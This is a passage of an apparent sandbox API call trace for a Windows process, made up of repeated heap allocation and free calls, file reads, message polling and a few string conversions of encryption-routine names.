hHeap=0x770000) returned 1 [0036.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.295] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.295] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0xcab3, lpOverlapped=0x0) returned 1 [0036.297] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xcab3) returned 0x955018 [0036.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0036.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0036.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xcab3) returned 0x961ad8 [0036.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.300] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xcab3) returned 0x955018 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.301] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0036.301] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.301] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xcab3) returned 0x955018 [0036.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0036.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0036.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.302] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ceb0 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0036.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xcab3) returned 0x96e598 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0036.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.304] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0036.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0036.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.304] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.304] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3c8 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.305] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0036.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.305] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.306] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0036.307] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.307] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0036.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.308] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0036.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: 